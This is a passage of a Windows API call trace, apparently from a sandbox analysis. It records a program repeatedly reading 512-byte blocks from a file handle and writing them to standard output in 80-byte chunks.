(_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] GetFileType (hFile=0x50) returned 0x1 [0132.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.244] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.244] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.245] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.245] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.246] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.246] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.247] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.248] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.249] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.250] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 